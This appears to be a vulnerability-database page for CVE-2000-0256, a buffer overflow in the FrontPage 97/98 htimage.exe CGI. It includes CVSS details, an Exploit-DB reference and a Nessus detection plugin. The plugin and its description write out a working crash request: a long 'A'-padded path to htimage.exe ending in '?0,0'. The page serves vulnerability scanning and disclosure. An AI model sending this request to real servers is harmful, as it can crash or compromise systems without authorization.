Vulnerabilities > CVE-2000-0256 - Buffer Overflow vulnerability in Microsoft Frontpage, Personal web Server and Windows NT

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
microsoft
nessus
exploit available

Summary

Buffer overflows in htimage.exe and Imagemap.exe in FrontPage 97 and 98 Server Extensions allow a user to conduct activities that are not otherwise available through the web site, aka the "Server-Side Image Map Components" vulnerability.

Vulnerable Configurations

Part Description Count
Application
Microsoft
2
OS
Microsoft
1

Exploit-Db

descriptionFrontPage 97/98 Server Image Mapper Buffer Overflow. CVE-2000-0256. Dos exploit for windows platform
idEDB-ID:19853
last seen2016-02-02
modified2000-04-19
published2000-04-19
reporterNarrow
sourcehttps://www.exploit-db.com/download/19853/
titleFrontPage 97/98 Server Image Mapper Buffer Overflow

Nessus

NASL familyCGI abuses
NASL idFP_HTIMAGE.NASL
descriptionThe htimage.exe CGI is installed on the remote web server. This CGI is vulnerable to a remote buffer overflow attack when it is given the request : /cgi-bin/htimage.exe/AAAA[....]AAA?0,0 A remote attacker could use this to crash the web server, or possibly execute arbitrary code.
last seen2020-06-01
modified2020-06-02
plugin id10376
published2000-04-19
reporterThis script is Copyright (C) 2000-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10376
titleMicrosoft FrontPage htimage.exe CGI Remote Overflow
code
#
# (C) Tenable Network Security, Inc.
#

# Added some extra checks. Axel Nennker [email protected]

include("compat.inc");

if(description)
{
 script_id(10376);
 script_version ("1.44");
 script_cve_id("CVE-2000-0256");
 script_bugtraq_id(1117);

 script_name(english:"Microsoft FrontPage htimage.exe CGI Remote Overflow");
 script_summary(english:"Is htimage.exe vulnerable to a buffer overflow ?");

 script_set_attribute(attribute:"synopsis", value:
"A web application on the remote host has a buffer overflow
vulnerability." );
 script_set_attribute(attribute:"description", value:
"The htimage.exe CGI is installed on the remote web server.  This CGI
is vulnerable to a remote buffer overflow attack when it is given
the request :

  /cgi-bin/htimage.exe/AAAA[....]AAA?0,0

A remote attacker could use this to crash the web server, or possibly
execute arbitrary code." );
 script_set_attribute(attribute:"see_also",
   value:"https://seclists.org/bugtraq/2000/Apr/105"
 );
 script_set_attribute(attribute:"see_also",
   value:"https://seclists.org/bugtraq/2000/Apr/148"
 );
 script_set_attribute(attribute:"solution", 
   value:"Remove this file from the web server."
 );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"plugin_publication_date", value: "2000/04/19");
 script_set_attribute(attribute:"vuln_publication_date", value: "2000/04/18");
 script_cvs_date("Date: 2018/11/15 20:50:17");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_DENIAL);
 script_family(english:"CGI abuses");

 script_copyright(english:"This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.");
 
 script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");

 exit(0);
}

# The attack starts here
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");



port = get_http_port(default:80);

if(http_is_dead(port:port))exit(0, "The web server on port "+port+" is already dead.");

foreach dir (cgi_dirs())
{
 if (is_cgi_installed3(item:string(dir, "/htimage.exe"), port:port))
 {
  req = string(dir, "/htimage.exe/", crap(741), "?0,0");
  w = http_send_recv3(port: port, method:"GET", item: req, exit_on_fail: 0);
  if (isnull(w))
   {
    security_hole(port);
   }
  if (! thorough_tests)
    exit(0, build_url(port: port, qs: dir + "/htimage.exe") + " is not vulnerable.");
 }
}

exit(0, "No vulnerable CGI was found on port "+port+".");